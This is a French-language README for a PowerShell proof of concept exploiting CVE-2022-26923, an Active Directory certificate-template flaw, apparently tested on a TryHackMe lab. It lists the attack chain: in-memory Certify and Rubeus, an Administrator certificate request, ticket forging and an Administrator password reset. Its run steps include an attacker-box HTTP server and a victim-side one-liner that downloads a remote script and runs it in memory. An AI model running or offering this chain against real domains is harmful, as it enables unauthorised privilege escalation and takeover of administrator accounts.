CVE-2022-26923-Powershell-POC
Un POC PowerShell pour charger et exécuter automatiquement Certify et Rubeus depuis la mémoire.
- Charge Certify.exe et Rubeus.exe en mémoire.
- Scanne la machine cible à la recherche de modèles de certificats mal configurés. (plus d'informations sur https://www.youtube.com/watch?v=HBRCI5O35R8)
- Demande un certificat pour l'utilisateur Administrateur, basé sur le modèle vulnérable.
- Envoie le certificat au gestionnaire de certificats, qui le convertit au format .pfx et le renvoie au client.
- Utilise Rubeus pour charger le certificat et générer un ticket pour l'utilisateur Administrateur.
- Modifie le mot de passe de l'utilisateur Administrateur. (Uniquement pour la démo)
Le POC est testé sur le laboratoire TryHackMe suivant : https://tryhackme.com/room/adcertificatetemplates
Cette CVE est utilisée pour l'élévation de privilèges, donc aucune exploitation initiale n'est couverte dans cette démo, ni dans le laboratoire THM.
Étapes :
- python3 -m http.server 80 [Attacker Box]
- python3 uploader.py 8000 [Attacker Box]
- IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [Victim Box]
Remarque : Ce POC est à des fins éducatives, vous êtes responsable de vos propres actions.